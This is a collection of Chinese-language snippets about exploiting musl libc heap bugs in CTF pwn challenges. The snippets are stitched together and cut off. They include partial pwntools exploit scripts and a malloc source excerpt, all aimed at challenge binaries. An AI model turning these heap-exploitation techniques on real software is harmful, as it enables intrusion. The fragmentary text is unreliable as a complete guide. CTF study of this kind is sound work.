Musl作为一个轻量级的libc库,相对来说学习成本比较低,如果仅仅是为了解决当前比赛中的Musl pwn很快就能上手,但是分析源码和调试漏洞的过程中收获还是很多的。 这个过程中借鉴了很多师傅的经验,受益匪浅,也少走了很多弯路。 参考 https://niebelungen-d.top/2021/08/22/Musl-libc-Pwn-Learning/ ...
musl libc是一种轻量级的C标准动态链接库,用来替代日益臃肿的glibc,Alpine Linux,Openwrt以及Gentoo等都是用musl libc作为默认的libc库。目前基于musl libc出的pwn题目也是越来越多。这几天参加了2021 WMCTF就遇到了一个基于musl libc 1.1.24的堆UAF漏洞利用的题目。 分析 首先我们看一下给出的libc.so文件 musl li...
from pwn import* context(os = 'linux', arch = 'amd64', log_level = 'debug') s = process('./pwn') libc = ELF('./libc.so') def add(content): s.sendlineafter(b'>>', b'1') s.sendafter(b'Please input the content\n', content) def delete(index): s.sendlineafter(b'>>',...
利用这个泄露出,libc和secret,即可伪造meta_area及meta。from pwn import* context(os='linux',arch='amd64',log_level='debug') s = process('./r') def add(index,size,content): s.sendlineafter(b'>>', b'1') s.sendlineafter(b'idx?\n', str(index)) s.sendlineafter(b'size?\n', str...
from pwn import* context(os = 'linux', arch = 'amd64', log_level = 'debug') s = process('./pwn') libc = ELF('./libc.so') def add(content): s.sendlineafter(b'>>', b'1') s.sendafter(b'Please input the content\n', content) ...
./pwn') #p=remote('node1.anna.nssctf.cn',28531) elf = ELF('./pwn') libc=ELF('./libc...
1.1.24muslpwn 1.1.24muslpwn 关键源码 static void unbin(struct chunk *c, int i) { if (c->prev == c->next) // 若 bin 只有一个 chunk,将 bin 设为空 bin a_and_64(&mal.binmap, ~(1UL linux sed 3c 原创 wx631ad6b870f4e ...
musl libc 是一个专门为嵌入式系统开发的轻量级 libc 库,以简单、轻量和高效率为特色。有不少 Linux 发行版将其设为默认的 libc 库,用来代替体积臃肿的 glibc ,如 Alpine Linux(做过 Docker 镜像的应该很熟悉)、OpenWrt(常用于路由器)和 Gentoo 等 1.2.x采用src/malloc/mallocng内的代码,其堆管理结构与...
Pwn-手动编译测试musl1.2.2 meta dequeue特性 基础知识 论坛上 师傅写的 很好,研究一下午就大致能了解透彻musl 1.2.2的内存管理结构和机制。美中不足的是没讲讲怎么编译一个用musl libc的程序。本文就简单介绍介绍如何编译一个musl libc下的程序,并通过它简单调试调试musl libc 的一些特性。
from platform import libc_ver from pwn import * from hashlib import sha256 import base64 context.log_level = 'debug' #context.arch = 'amd64' context.arch = 'amd64' context.os = 'linux' io = lambda : r.interactive() sl = lambda a : r.sendline(a) sla = lambda a...